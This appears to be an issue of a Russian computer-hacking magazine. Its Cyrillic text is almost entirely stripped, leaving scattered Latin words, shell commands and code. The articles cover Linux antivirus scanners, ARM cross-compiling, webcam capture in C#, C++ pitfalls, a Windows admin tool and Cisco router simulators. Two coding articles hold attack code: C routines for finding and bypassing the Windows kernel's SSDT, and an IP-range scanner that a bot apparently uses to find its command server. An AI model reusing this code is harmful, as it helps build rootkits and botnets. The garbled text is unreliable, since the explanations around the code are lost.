com/en-us/projects/singularity/),
. .z
X 07 /138/ 10

UNIXOID
Adept adeptg@gmail.com

Linux
,
Linux ?
, , ,
, , !
.

, ,

. Linux . ,
Linux , 99%
, , ,
( , ,
).
, , Linux.
Ramen ( wu-ftpd
Red Hat 6.2 7.0), Badbunny
OpenOffice .

Linux. ,
,
, .
Linux-.


Linux.
Linux-

096

.
Linux 1-2%,
security- .
,
,
-.
Linux.
, , -
,
( , , ,
-).
,
Linux .

.
,
.

,
(,
).
Dr.Web Linux,
6
.
32-, 64- .
.run-,
.
.
,
- 30 (-
1 4 ).
Gnome DrWeb
( :
), ,

,
.
CLI- ,
:
X 07 /138/ 10

Dr.Web Linux
AVG LiveCD
$ /opt/drweb/drweb ./

,
ini-, :
$ /opt/drweb/drweb -ini=/home/adept/.drweb/
drweb32.ini ./

, 799
(GTK) CLI , DE, ,
.
,
Linux-.
Dr.Web, ,
Linux- .
. Linux Workstation , Kaspersky Total Space Security, Kaspersky
Enterprise Space Security, Kaspersky Business Space Security
Kaspersky Work Space Security ( 7700 ).
Linux
(5.7.26) 2008. deb
rpm, 32-, 64-.
( ), ,
webim kavmonitor (

). , kavmonitor
2.6.21 ( 32- ) 2.6.18 ( 64-),
-
. ,
CLI. :
$ sudo /opt/kaspersky/kav4ws/bin/kav4wskavscanner /tmp

:
$ sudo /opt/kaspersky/kav4ws/bin/kav4wskeepup2date

/etc/opt/
kaspersky/kav4ws.conf.
ESET Linux- (ESET
X 07 /138/ 10

NOD32 Antivirus 4 for Linux Desktop), , ,


-. -
.
, ,
. x86
x86-64, . /opt/eset.
GTK
,
. , : Setup (
) Tools ( ,
). CLI-, :
$ /opt/eset/esets/sbin/esets_scan ./

'-h' .
,
Linux- McAfee. ,
Linux-,
( , , -
IIS , :)). All-in-one

Linux: LinuxShield (,
) VirusScan Command Line Scanner for
Linux. LinuxShield 2 .
Command Line Scanner Linux (x86 x86-64),
: Windows, FreeBSD,
Solaris, HP-UX AIX. McAfee
,
11
, , , . Command Line Scanner
install-uvscan .
(
)
. , Ubuntu 10.04 ,
libstdc++.so.5.
(http://packages.debian.org/stable/base/libstdc++5).
, -
.
.
:

HTTP://WWW
links

products.drweb.
com/linux Dr.Web
Linux
www.freedrweb.
com/livecd Dr.Web
LiveCD
www.kaspersky.
ru/anti-virus_linux_workstation

Linux Workstation
beta.eset.com/linux
NOD32 Linux
www.bitdefender.
com/world/business/
antivirus-for-unices.
html BitDefender
Linux
free.avg.com/gb-en/
download.prd-afl
AVG Free Edition for
Linux
www.avast.com/
linux-home-edition
avast! Linux Home
Edition
www.clamav.net
ClamAV
code.google.com/p/
viavre/ ViAvRe

INFO

info
ClamAV
2008 (

).

097

UNIXOID

DAZUKOFS

. -,
DazukoFS ( Dateizugriffskontrolle, ) , . DazukoFS
, , ,
. DazukoFS
.
Dazuko
GPL Avira GmbH. , DazukoFS,
.


$ uvsan ./

man uvscan
. LinuxShield
RHEL SLED, (, , ) . - . , 2.6.18.


( Linux-). , , BitDefender.
BitDefender Antivirus Scanner for Unices
.
, , for personal usage only.
BitDefender : deb- rpm, ipk ( ) tbz FreeBSD.
32-, 64- . 128 .
, .
GUI ( DE), CLI.
:

. ,
32-.
( : ;
: www.avast.com/registration-free-antivirus.php). GUI,
CLI-. :
$ avast ./

$ bdscan ./

:
:
$ sudo avast-update
$ sudo bdscan --update

, man bdscan .
AVG.
Linux (deb, rpm, sh . ,
32-) FreeBSD ( x86). 9-
, 8.5 ( 2010), .
.
: (RedirFS Dazuko).
, CLI.
:
$ avgscan ./

:
$ sudo avgupdate

avast. . deb, rpm


. , 32-.
DE. avastgui.

098

,
F-PROT. Linux: F-PROT Antivirus for Linux
Workstations. Linux (i386, x86-64 PowerPC), FreeBSD,
Solaris ( SPARC Intel) AIX. Linux (6.0.3)
2009 .
install-f-prot.pl. /usr/local/bin (
,
F-Prot, , ,
-, , /opt).

. :
$ fpscan /

: , (
30), ..
( man fpsan).
fpupdate ( ).

( )
OpenSource clamav. GUI
X 07 /138/ 10

Dr.Web LiveCD

- NOD32

LiveCD
(clamtk GTK klamav kde).
DazukoFS. ,
.
, ,
. !


LiveCD ,
-
, . ,

LiveCD,
. , Dr.Web
LiveCD. (5.02) ,
- ( ). ,
6 Linux LiveCD .
, (, , 2.6.30), LiveCD
drweb ,

. SafeMode
.
X 07 /138/ 10

KAV2010
Dr.Web, LiveCD , .
! :) LiveCD : http://
devbuilds.kaspersky-labs.com/devbuilds/RescueDisk10. LiveCD . ,
Gentoo 2.6.31, .
GUI ( kav 2010)
.
AVG LiveCD. , , , ,
( ). LiveCD,
.
, ,
FAT NTFS, . (
arl ),
.
(Windows Registry Editor).
, . , ViAvRe (Virtual Antivirus Rechecker),
: Avg, Avast, Doctor
Web (CureIt), McAfee, BitDefender, F-Prot.
, .
(04.10, ) OpenSuse 11.2
SuSeStudio.
viavre-update,
. LiveCD
: full KDE ( 768 ) light LXDE (
mcafee, avg, firefox, virtualbox k3b;
256 ).

WARNING
warning
,
LiveCD
.

,

.

DVD
dvd


LiveCD.
,
:).

, Linux, .
, , Panda DesktopSecure for Linux
Avira. ,
- .z

099

UNIXOID
diver@edu.ioffe.ru, ICQ 308229460

FriendlyArm Android

:

-x86
- Linux

.
Intel' x86.

, ,
. ,
embedded ( ) - GNU/Linux
, , - Windows.
,
.
,

100

:
- . ,
, - -

.

:
. ,
X 07 /138/ 10

Linux-

,
. GNU/Linux
,
Make-.
, ,
.
, - .
Make- ,
Unix-.

Linux-box'.

Linux, ( bare metal), , .
.

,

, ,

embedded-! , !
,
- -- ,
. ,
, ? , , -
! ,
,
.
GUI-
.
,
Wine,
(: USB-
Silabs C8051: http://ec2drv.sourceforge.net). ,
Windows-, GNU- .
X 07 /138/ 10


,
embedded-?


,
.
,
, ( IDE Integrated Desktop Environment).
, ,
. .
Code::Blocks (www.codeblocks.org).
, . , ,
make-
IDE.
, ,
. ,
2008 , ,
svn.
Eclipse (www.eclipse.org). , Java, ,
.
,
. Vim/Emacs.

. . , -

.
gedit, kate.
.
, .

HTTP://WWW
links

http://wiki.starterkit.
ru/cross_compiler

crosstoolng.
http://wiki.openembedded.net



.

INFO

info
JTAG


.

,

.

,
. .
GNU GCC. , , GCC,
Linux-. , ,
, , .

101

UNIXOID


.
U-boot. ,
USB
(Xmodem).
,
.
,
, JTAG. : ,
.

, ,
. SDCC Small Devices
C Compiler.
Intel MCS51, AVR, HC08, PIC Z80.
8051 Keil.
. Keil, .
Wine . , .
. ,
.
,
.

, - , ,
ARM-. GCC :
arm-linux arm-gcc. , ,
Linux,
. ,
.
, ,
, Linux ,
.
, , . , Linux
.
,
. :
$ vi hello.c
#include <stdio.h>
int main (){
printf("Hello world!\n");
}

:
$ arm-linux-gcc -o hello hello.c
$ file hello
hello: ELF 32-bit LSB executable, ARM, version 1,
statically linked, not stripped

, ,
, .
Make-,
make. :
$ CC=arm-linux-gcc make

configure, , , :

102


$ CC=arm-linux-gnu-cc ./configure --host=arm

,
? PC
PC-, - !
, . , . -
, apt-get install libncurses5-dev
. ,
,
.
Debian, , - . , ,
,
.
,
, , . , embedded-
uclibc
glibc. ,
, . ,
Dependency Hell,
,
-.
, - ,
,
.
, ,
? ,
.
, ,
,
, , ,
. ,
,
, , :
$ ls
startup.S main.c sdram.lds
$ arm-elf-gcc -Os -march=armv4t -c \
-o startup.o startup.S
$ arm-elf-gcc -Os -march=armv4t -c -o main.o main.c
$ arm-elf-gcc -T"sdram.lds" -s -Os -march=armv4t \
-nostartfiles -nostdlib -o firmare.elf startup.o main.o
$ arm-elf-objcopy --strip-debug --strip-unneeded \
firmware.elf -O binary firmware.bin
X 07 /138/ 10

- Linux-
FriendlyARM (http://friendlyarm.net).
, Mini2440, Samsung
s3c2440 LCD-. , 150 .

, , .
,
, . "-Os"
,
"-march=armv4t"
ARMv4. ,
,
.
. "-Tsdram.lds". lds
. , , , ,
. ,
x86-, gcc -
. . , ,
lds, .

,
,


. , ,
, ,
ELF ( PE ), .
ELF-,
, ! ELF-
, .
,
. , ,
.

,
. -
. , .
. , jffs2-
Ethernet/
Xmodem/SD-card/-.
.
, ?
. ,
- (, JTAG I2C).
. ,
.
X 07 /138/ 10


ARM-
Openocd (http://openocd.berlios.de) ,
ARM MIPS- JTAG.
. Must have.
, C2 JTAG- SiLabs
linux- http://wiki.
enneenne.com/index.php/Silicon_C2_Interface
Ec2drv (http://ec2drv.sourceforge.net).
Eep24c
I2- EEPROM.
LPT-. avrdude/
avrprog/uisp/dfu-programmer Atmel AVR.
, .
,
- .
Windows-
, .
.


gcc- ,
. ,
.
Emdebian (emdebian.org), .
Debian, , ,
. Ubuntu (, !)
-x86 , ,
.

/,
crosstool-ng (http://ymorin.is-a-geek.org/
projects/crosstool). ,
, .
,
-.

__EXIT()
, . ,
, . ,
, embedded-..z

103

CODING
stannic.man@gmail.com


WINDOWS

,
Windows, ,
.
, , .
, ,
, ,
.
.
,

Rustocka TDSS,
. , , ,

.

, - .
, , ,
, (
, ).
. :
,
, , ,
.
, - - .
- ! ,
,

. , .

, kernel-based -
, ,
. ,
,
?
, Windows, /, , , ,
, , KeServiceDescriptorTable/

104

KeServiceDescriptorTableShadow,
.

KESERVICEDESCRIPTORTABLE

, . ,
,
KeServiceDescriptorTable
, ,
NtCreateFile, NtCreateProcess, NtCreateThread ..
, ,
( , ,
). , ,
- ,
KeServiceDescriptorTable -, .
(F-Secure, , NtLoadDriver)
( COMODO Internet Security Outpost).
, , . , Kaspersky AV (?) SSDT,

. KeServiceDescriptorTable
KeServiceDescriptorTableShadow.
win32k.sys, , ,
, Windows.
Win32k.sys : NtUser* NtGdi*,
, .
, Win32k
: ,
KeServiceDescriptorTableShadow NtUserFindWindowEx,
NtUserQueryWindow, NtUserGetForegroundWindow
windows-.
KeServiceDescriptorTable.
, : extern PVOID KeServiceDescriptorTable.
KeServiceDescriptorTableShadow , , .
X 07 /138/ 10

>> coding

DVD
dvd

KeServiceDescriptorTable
, ? ?
SSDT ,
. ,
, . ZwOpenFile/ZwCreateSection/ZwMapViewOfSection

ntoskernl.exe (ntkrnlpa.exe
).
KeServiceDescriptorTable,
.
KiServiceTable
ULONG FindKiServiceTable(
ULONG SdtPtr,
ULONG Handle)
{
ULONG bFirst = 1, RvaPtr, i;
pointer = (char *)Handle;
pointer += 0x3c;
pointer = (char *)(*(ULONG *)pointer)
+ Handle + 0xA0;
reloc = (PIMAGE_BASE_RELOCATION)(char *)
(*(ULONG *)pointer) + Handle);
while ((bFirst)
||(reloc-> VirtualAddress))
{
bFirst = 0;
fixup = (PIMAGE_FIXUP_ENTRY)
((ULONG)reloc + 8);
for (i=0;i<(reloc->SizeOfBlock - 8)>>1;
i++, fixup++)
if ( fixup->type == 3)
{
X 07 /138/ 10

RvaPtr = reloc->VirtualAddress +
fixup->offset;
if (*(PULONG)( Handle + RvaPtr) 0x400000 == SdtPtr)
{
if (*(PUSHORT)( Handle + RvaPtr - 2)
== 0x05c7)
return (*(PULONG)( Handle + RvaPtr
+ 4) - 0x400000 + Handle);
}
}
*(PULONG)&reloc += reloc->SizeOfBlock;
}
return 0;


WRK Windows
Research Kernel,

Windows.

Windows :).

HTTP://WWW
links

,


wasm.ru
http://rsdn.ru/
forum/asm

}
}

, ,
, SSDT , ,
.
,
NtCreateSection NtMapViewOfSection,
. , .
, SSDT ShadowSSDT,
.

POSITION NUMBER TWO

,
.
KeServiceDescriptorTable
KeServiceDescriptorTableShadow,
KTHREAD. ,

105

CODING

KeServiceDescriptorTableShadow
, KeServiceDescriptorTable.
KeServiceDescriptorTable
, KTHREAD.ServiceDescriptorTable

KeServiceDescriptorTable. !
.
? ETHREAD,
KTHREAD ( ),
PsLookupThreadByThreadId (
PsLookupProcessThreadByCid), , :
__asm push esi;
__asm mov esi, fs:[0x124].

esi
ETHREAD. , , .

POSITION NUMBER

:
( , :)). , ,
Windows. ,
PTE ,


NtWriteVirtualMemory. ? ,
?
, KeServiceDescriptorTable
, ,
, PTE.
:
. :
ULONG_PTR GetPhysicalAddress(
IN ULONG_PTR VirtualAddress)
{
return (VirtualAddress & 0x1FFFFFFF);
}

106

? .
Windows . CreateFile/
ReadFile/WriteFile. ,
Windows . , , ,
,
. , .
. NT),
.
:
WRK (Windows Research Kernel), ,
,
.
, , , SFC,
, , ,
. . ? , . ,
Windows - Linux
,
.
WRK .
, , ,
.

PRO & CONS

, . ,
,
. , ,
.
,
. , , :). proof of concept.
, ! z
X 07 /138/ 10

>> coding
RankoR ax-soft.ru

02

01
WINDOWS

03
$$

WINDOWS
#irc
WINDOWS



][
, , ,
.
,
.

][,
QTss-Brute . ,
: RDP,
:). !

,
. ? -
, , .
, xxx.xxx.0.0-xxx.xxx.255.255
10-100 . ,
.
, . , ,
. IP .
, , (!)
. , , ,
. :
, .
, , , :).
X 07 /138/ 10

, IP
,
.
,
, , .
, ?
. , , .

, . MS Visual Studio 2008


C ( C, C++!),
Intel. ? 2010
(MSI Wind u90) , , , . , Intel
, - , ,
Microsoft .
, .
Win32 Console Application ( ,

107

CODING

04

WINDOWS

#irc
WINDOWS

LOW
INTEREST
RATES!!

GIMME
CREDIT
CARDS

EXTEND
YOUR
PENIS

GET
A BETTER
JOB

#irc

CHEAP
MOVIE
TICKETS

#irc

IRC-

DVD
dvd

(
)

WARNING
warning


.
,
,
,

,
,
.

Win32 Application).
TCP/IP,
winsock2.
( ,
),
.
:

getServer();
getRange();
while ( true )
{
sock = tcp_connect(srv, PORT);
if ( sock > 0 ) {
/*..SOME MAGIC..*/
} else { // Server is dead!!!!111
range = getRange();
server = findServer((char*) range);
if ( server == NULL )
continue;
memcpy(srv, server, 20);
}
Sleep(1000);
}

findServer()
char *findServer(
const char *fIP
)
{
Range range;
char *server;
memcpy(range.startIP, fIP, 3);
memcpy(range.endIP, fIP, 3);
range.startIP[3] = 0;
range.endIP[3] = 255;
server = scanRoutine(&range);
if ( server )
return server;
range.startIP[2] = 0;
range.endIP[2] = 255;
server = scanRoutine(&range);
if ( server )
return server;

(, , ?)
.
- ,

.

range.startIP[1] = 0;
range.endIP[1] = 255;
server = scanRoutine(&range);

return server;
// Returning pointer anyway (NULL too)

metal, DieHard, YaesU, DjFly, Miracle,



}

108

X 07 /138/ 10

>> coding

scanRoutine()
char *scanRoutine(
const Range *range)
{
unsigned int a, b, c, d;
char *server, data[8];
SOCKET sock;
server = (char*) malloc(20);
d
c
b
a

=
=
=
=

range->startIP[3];
range->startIP[2];
range->startIP[1];
range->startIP[0];

while ( true )
{
if ( d > 255 )
d = 0, c++;
if ( c > range->endIP[2] &&
b == range->endIP[1] )
break;
if ( c > 255 )
c = 0, b++;
if ( b > range->endIP[1] &&
a == range->endIP[0] )
break;
if ( b > 255 )
b = 0, a++;


getRange() IP (
, , , ) ,
. getServer() , .
findServer()
(. ). , IP 192.168.1.1.
192.168.0.0-192.168.255.255.
192.0.0.0-192.255.255.255,
0.0.0.0-255.255.255.255.
( ) .
range:

sprintf(server, %u.%u.%u.%u, a, b, c, d);


sock = tcp_connect(server, PORT);

typedef struct
{
unsigned char startIP[4], endIP[4];
} Range;

if ( sock > 0 )
{
// OK, port is open, now check it!
if ( tcp_send(sock, cliHello, 8) < 0 )
continue;

IP
( , unsigned char).
, . , ,
.
cliHello srvHello:

tcp_recv(sock, data, 8);


if ( memcmp(data, srvHello, 8) )
continue;
closesocket(sock);
return server;
// Thats ok!!!

const char cliHello[] = "\xD\xE\xA\xD\xB\xE\xE\xF";


const char srvHello[] = "\xF\xE\xE\xB\xD\xA\xE\xD";

, cliHello, srvHello. ,
, srvHello ,
.
.
IP . cliRange
:
const char cliRange[] = "\xA\xB\xC\xD";

, .
, !
X 07 /138/ 10

}
d++;
}
free(server);
return NULL;
}

. , .exe
12.5 , C C.
. ,
( ..) :). , .
, . , ,
. ! z

109

CODING
http://vr-online.ru

-

-
, .
,
. . ,
-
, .
:

, ,
.NET Framework
-. ( SilverLight- ), , VS2010 4- .NETa.
, .
,
MSDN DirectDraw. , - DirectDraw
.
, .
,
. ,
. ( ).
DirectDraw,
. .
, .
DirectDraw, .
- ,
VFW (Video For Windows). , (
) . , -

110

-.
,
. , ,
, . , win-
WinAPI . - -
-
Delphi. .
, .

, 1

, /
-. .
.
.
. .
, .
, ,
,
.
WindowsAPI capGetDriverDescription(). :
1. wDriverIndex .
0 9;
X 07 /138/ 10

>> coding

WinAPI .NET
d.Name = dName.Trim();
d.Version = dVersion.Trim();
devices.Add(d);

,
!
}
}

2. lpszName , ;
3. cbName ( ) lpszName;
4. lpszVer ,
;
5. cbVer ( ),
.
TRUE.
, , C#. :
[DllImport("avicap32.dll")]
protected
static
extern bool capGetDriverDescriptionA(
short wDriverIndex,
[MarshalAs(UnmanagedType.VBByRefStr)]
ref String lpszName,
int cbName,
[MarshalAs(UnmanagedType.VBByRefStr)]
ref String lpszVer,
int cbVer);

, , , DLL, .
avicap32.dll. , ,
, .

, :
public static Device[]
GetAllCapturesDevices()
{
String dName = "".PadRight(100);
String dVersion = "".PadRight(100);
for (short i = 0; i < 10; i++)
{
if (capGetDriverDescriptionA(i,
ref dName, 100,
ref dVersion, 100))
{
Device d = new Device(i);
X 07 /138/ 10

return (Device[])devices.ToArray(
typeof(Device));
}

.
,
capGetDriverDescription.
MSDN , (
capGetDriverDescription()) 0 9,
.
Device
( ,
).
,
.
capCreateCaptureWindow(),
.
, ,

. , , windows- (
) SendMessage().

capCreateCaptureWindow().
:
1. lpszWindowName - , ;
2. dwStyle ;
3. x X;
3. y Y;
4. nWidth ;
5. nHeight ;
6. hWnd handle ;
7. nID .
handle
NULL .
WinAPI,
- . , ,
capGetDriverDescription().
:

HTTP://WWW
links
blogs.msdn.com

Silverlight
4 real-time Face
Detection (

SilverLight).
facelight.codeplex.
com
Facelight,
.



,


.
www.aforgenet.
com/framework
AForge
.NET

, ..
vr-online.ru
,


VROnline.

111

CODING

!
!
deviceHandle = capCreateCaptureWindowA(
ref deviceIndex, WS_VISIBLE | WS_CHILD, 0, 0,
windowWidth, windowHeight, handle, 0);
if (SendMessage(deviceHandle,
WM_CAP_DRIVER_CONNECT, this.index, 0) > 0)
{
SendMessage(deviceHandle, WM_CAP_SET_SCALE, -1, 0);
SendMessage(deviceHandle, WM_CAP_SET_PREVIEWRATE,
0x42, 0);
SendMessage(deviceHandle, WM_CAP_SET_PREVIEW, -1, 0);
SetWindowPos(deviceHandle, 1, 0, 0,
windowWidth, windowHeight, 6);
}


WM_CAP_DRIVER_CONNECT.
.
,
: WM_CAP_SET_
SCALE, WM_CAP_SET_PREVIEWRATE, WM_CAP_SET_PREVIEW. ,
, C#
. .

.
- . ,

. ,
.
(, ) :
GetAllDevices ( ), GetDevice (
), ShowWindow (
-), GetFrame (
) GetCapture ( ).

( ). ComboBox (
)
, , . ,
Image.
. .
. :

112

//
private const int WM_CAP = 0x400;
//
private const int WM_CAP_DRIVER_CONNECT = 0x40a;
//
private const int WM_CAP_DRIVER_DISCONNECT = 0x40b;
//
private const int WM_CAP_EDIT_COPY = 0x41e;
///
private const int WM_CAP_SET_PREVIEW = 0x432;
///
private const int WM_CAP_SET_OVERLAY = 0x433;
// previewrate
private const int WM_CAP_SET_PREVIEWRATE = 0x434;
///
private const int WM_CAP_SET_SCALE = 0x435;
private const int WS_CHILD = 0x40000000;
private const int WS_VISIBLE = 0x10000000;
// callback- preview
private const int WM_CAP_SET_CALLBACK_FRAME = 0x405;
//
private const int WM_CAP_GRAB_FRAME = 0x43c;
//
private const int WM_CAP_SAVEDIB = 0x419;

Device[] devices = DeviceManager.GetAllDevices();


foreach (Device d in devices)
{
cmbDevices.Items.Add(d);
}

, ?
.
:
Device selectedDevice =
DeviceManager.GetDevice(cmbDevices.SelectedIndex);
selectedDevice.ShowWindow(this.picCapture);

, .
:
Device selectedDevice =
DeviceManager.GetDevice(cmbDevices.SelectedIndex);
selectedDevice.FrameGrabber();

FrameGrabber().

. , ,
.

, ,
.
: .
() ,
X 07 /138/ 10

>> coding


.
,
.NET AForge.NET. AForge.NET
.

: ,
( , ,
, , ), , , ..
. . .
. .
. ,
.
WinAPI ? .
, . ,
. - .NET,
- WinAPI.
. MotionDetector . Bitmap
. :
MotionDetector detector = new MotionDetector(
new TwoFramesDifferenceDetector( ),
new MotionAreaHighlighting( ) );
//
if ( detector != null )
{
float motionLevel = detector.ProcessFrame( image );
if ( motionLevel > motionAlarmLevel )
{
flash = (int)
( 2 * ( 1000 / alarmTimer.Interval ) );
}
if ( detector.MotionProcessingAlgorithm is
BlobCountingObjectsProcessing )
{
BlobCountingObjectsProcessing countingDetector =
(BlobCountingObjectsProcessing)
detector.MotionProcessingAlgorithm;
objectsCountLabel.Text = "Objects: " +
countingDetector.ObjectsCount.ToString( );
}
else
X 07 /138/ 10


{
objectsCountLabel.Text = "";
}
}

(
MotionDetector)
-. ,
( ProcessFrame): motionlevel
motionLevelAlarm (0.015f), , ! .
.

-
- ? , ! http://
codeplex.com ( OpenSource MS)
( ),
-.
.NET
SilverLight.
, .
( , , , ..) SilverLight .
.


.
-
, . Skype-. ,
. . ,
- ,
, ,

:). . z

113

CODING
deeonis deeonis@gmail.com

C++

C++! C
,
, ,
.
.
C++ ,
- .
, .

,
. ,
, .
,
, :

class Shape {
public:
enum ShapeColor { Red, Green, Blue };
virtual void draw(ShapeColor color = Red) comst = 0;

};
class Rectangle: public Shape {
public:
virtual void draw(ShapeColor color = Green) const;

};
class Circle: public Shape {
public:
virtual void draw(ShapeColor color) const;

};

Shape,
draw.
, Shape Rectangle Circle.

114

- .
:
Shape
// Shape*
Shape *ps;
// Shape*
Shape *pc = new Cercle;
// Shape*
Shape *pr = new Rectangle;

ps, pc pr Shape,
.
,
Shape*.
, , . , pc
Circle*, , Circle,
. ( ).

. ,
,
. ,
,
, .

// Circle::draw(Shape::Red)
pc->draw(Shape::Red);
// Rectangle::draw(Shape::Red)
pr->draw(Shape::Red);
// Rectangle::draw(Shape::Red)!
pr->draw();

X 07 /138/ 10

pr Rectangle*, ,
, Rectangle.
Rectangle::draw Green.
pr Shape*,
Shape, Rectangle. ps, pc pr
, . , draw ,
.
C++ ?
.
,
,
,
.
.
, , , ,
-,
, ?

class Shape {
public:
enum ShapeColor { Red, Green, Blue };
virtual void draw(ShapeColor color = Red) comst = 0;

};
class Rectangle: public Shape {
public:
virtual void draw(ShapeColor color = Red) const;

};

.
, .
Shape,
.

.

.
. , ,
(NVI) ,
, .
,
.

, , . , , B,
D. B
mf. , , void. :
D B
class B {
public:
void mf();

X 07 /138/ 10

};
class D: public B {};

, mf .
- ,

.

class D: public B {
public:
// B::mf
void mf();
...
};
D x;
// x
D *pD = &x;
// D::mf
pD->mf();
// x
B *pB = &x;
// B::mf
//
pB->mf();

D, : B
*pB D *pD. mf pD ,

.
pB, mf.
, , B::mf D::mf, . , ,
pB B,
, pB , B, ( )
, B.
,
. mf B
, , .
D::mf, pB pD
D.
, D
mf, B, ,
D , . ,
D mf
D, B,
, .
.


.
( ) C++ , ,
, .
.z

115

SYN/ACK
grinder grinder@synack.ru




HYENA 8.0

, , . , Microsoft, ,
, . Hyena .
HYENA
,
. Windows
, ,
: Radmin, pcAnywhere, Netop, UltraVNC
. .
, ,
, ,
, . , WinRM, PowerShell
SCCM.
(GPO),
. GPO ,


, .

Hyena
-
,
,
. SystemTools Software
Inc. (systemtools.com)

, -
. , , Hyena , .

116




. Hyena
WinNT: User Manager,
Server Manager File Manager/Explorer,
,
MMC.
,
. ,

( ),
, , ,
. MMC
, , ,
.
, , ,
.
Hyena
,
.

MS Access Excel.
Enterprise-,
(
,
30 ), Exchange
Server 5.5/2000/2003,
WMI. Hyena

,
Windows NT 2000 .
Win7
Win2k8R2.
x64-, (PSO, Password Settings
Objects), Win2k8
.
8.
RDP VNC
,
. ,

. ,
Remote Control Manager
(STRCM,
systemtools.com/strcm,
freeware).
: Hyena

,
.
, , .
,
30 .

.
, Next . , Hyena.
,
X 07 /138/ 10

, . Hyena .

, Hyena, . ,
24/7, , Hyena .
.


, ,
(
, , , ).
, ,
.
,
, Enterprise
Windows Network (SMB) Windows.
, ,
,
Hyena . File Add Domain;
.
, Find All Domain,
.

Object Manager Configuration,
. , : File Manage Object View,
Objects, Add Windows
Domain.
, :
, OU, , , URL, ..


, . . ,
, X 07 /138/ 10

: , ,
, (
). ,
, .
, , ,
.
.
(
), ,
.
( , ) Printers. ,
, ,
, /
.
:
.
, ,
( NTFS),
.

. Hyena .

, / . DFS (Distributed File
System)
.
( ),
, /, , Hyena. ,
, , . . , ,
.

. Events.

117

SYN/ACK

Hyena
Filter Events , ,
, .. -

,
:
WMI Execute Query
WMI Query Template Properties, -

Hyena
:
Remote Control
. RCM-,



(
),
,
.
Windows,

.
Hyena :

Account Policy Audit Policy.
: , ,
, .
,
Audit Properties
.

,
, , , .
Hyena ,
. Perfomance
, ,
, , CPU, ,
.
.
, WMI, ,
. -

118

WMI
.

. , WMI

(WMI Create
Proccess).
, (, , ,
..),
.
MS Access

.
Settings Reporting,

Access ( Excel) : Tools Generate
Report.

STRCM
, Hyena
. RDP-

mstsc.exe, . VNC, Remote Control Manager (STRCM),

VNC-. , STRCM ,
GNU GPL.

, Hyena. , ini-,

.
: rd.rcm rd_
admin.rcm RDP-,
vnc*.rcm
VNC.
Tools
Settings Remote dialog, ,
Edit,
.
:
#
[General]
# : RDP VNC
SoftwareType=VNC
#
Enabled=1
#
MenuName=TightVNC
#
AutoExecute=0
#
[View]
#
ViewerCommand=vncviewer.exe
%computer%
# RDP
# ViewerCommand=mstsc.exe
X 07 /138/ 10

WARNING

warning


RDP/VNC,
Remote Control
Manager.

INFO

info

WMI-

tool_cmds.dat,
,
.
(),
New Submenu.

,
.
:

( , , ..)
.
, RCM-

. Hyena
, .
".RCM file
configuration directory path", Hyena.


Hyena
Custom Tools.

,

Ctrl-F[1-9].
Tools Settings Tools,
X 07 /138/ 10

%S% , . "\\",

;
%E% ,
;
%G% , ,
;
%HOSTNAME% NETBIOS DNS-
(
Tools Settings Active Directory Use DNS
computer paths);
%Px% , :
%P1% , %P2% , %P3% ;
%Px:prompt% , ;
%Px:prompt/PWD% , .




][ 03.2010
.
AD
Hyena
RSAT (Remote
Server Administration
Tools)
AdminPak (Microsoft
Administration Tools).

HTTP://WWW
links

systemtools.com

, Hyena ,
. ,

.z

119

SYN/ACK
grinder grinder@synack.ru


CISCO SYSTEMS JUNIPER NETWORKS
, . , ,
.
PACKET TRACERT
: Cisco Systems Inc.
Web: cisco.com/web/learning/netacad/course_
catalog/PacketTracer.html
: Windows XP/Vista/7, Linux (Ubuntu, Fedora)
:
.
Cisco
,

( /) . ,

, .
,
CCNA
(Cisco Certified Network Associate, Cisco ), .
Cisco
Packet Tracert,
Networking Academy,
. :
.
PT ,

.
,
, Cisco (, ,
..). ,
.
,
Cisco (
). , , -

120

.
,

.
,
.
Packet Tracert ,

( ,
). ,
.
,
. .
,
.

.
drag'n'drop
, ,
.. , PT
, ,
Wireless
, .
, .
,
.
,
(, ).
Logical Workspace (Ctrl+L).

,
Physical

Workspace (Ctrl+P). PT
: Realtime
Mode (Ctrl+R) Simulations Mode (Ctrl+S).


. Realtime
, Simulations
,
( , , ..) Activity
Wizard
. , ,

Cisco , .

DYNAMIPS
: OpenSource
Web: http://www.ipflow.utc.fr/index.php/
Cisco_7200_Simulator
: Windows 2k/XP/Vista, x32/x64 Linux, Mac
OS X
: GNU GPL
Dynamips 2005
Cisco 7200

. Dynamips
Cisco
3600, 3700 2600.
: CPU (MIPS64 PowerPC),
RAM (DRAM, Packet SRAM, NVRAM),
. .
,

X 07 /138/ 10

.
, IOS (Internet Operating System)
.

Linux. pcap, Windows WinPCAP.
Ubuntu/Debian :

#
[[7200]]
# IOS-
image = /home/grinder/images/c7200.image
# , RAM,

npe = npe-400
ram = 160

$ sudo apt-get install dynamips

Dynamips , '--help'.
Cisco 7206VXR NPE-200 256 DRAM.
, '-P' (, "-P 3600"). '-t' (
'-t' ).
IOS Cisco, ,
( ,
). IOS- ,
:
$ unzip -p c7200-g6ik8s-mz.124-2.T1.bin > c7200.image

#
[[Router R1]]
# ,
Serial1/0 R1 Serial1/0 R2
s1/0 = R2 s1/0
[[Router R2]]
#

, .
. ,

, :

:
s2/0 = NIO_linux_eth:eth1
$ dynamips c7200.image

Dynamips ,
, .
Dynagen (dynagen.org),
- Dynamips.
, . , ,
.
$ nano v_router.net
# , Dynamips
[localhost]
X 07 /138/ 10

dynamips (
, '&'):
$ sudo dynamips -H 7200
Cisco Router Simulation Platform (version 0.2.8-RC2-amd64)
Copyright (c) 2005-2007 Christophe Fillot.
Build date: May 9 2009 18:06:28
ILT:
ILT:
ILT:
ILT:

loaded
loaded
loaded
loaded

table
table
table
table

"mips64j" from cache.


"mips64e" from cache.
"ppc32j" from cache.
"ppc32e" from cache.

121

SYN/ACK

Packet
Tracker

Packet Tracker realtime-


=> reload R1

,
.
:

IDLE PC

=> list
Name Type State Server Console
R1 7200 running localhost:7200 2000
R2 7200 running localhost:7200 2001

:
Hypervisor TCP control server started
(port 7200).

Dynagen:

$ telnet localhost 2000

,
Console. ,
Dynagen:

$ dynagen v_router.net

Dynagen
*** Warning: Starting R1 with no idlepc value

idle-pc ,
dynagen idlepc get _:
=> idlepc get R1

,
"*".
, ,
idlepc.
.
Dynamips idlepc
'--idle-pc=',
, Dynagen
:

=> telnet R1

(
, dynamips)

.
help, .
help , . <Tab>.
, , , start,
stop, reload, suspend, resume
/all :

idlepc = 0x6076a394

, .

.

. , Dynamips
, ,
.
idlepc IOS-
.
:


Cisco
help
setup
show config
configure terminal
enable [ ]
hostname Router
ip http server -
ip route 172.1.1.0 255.255.255.0 10.1.1.1 permanent
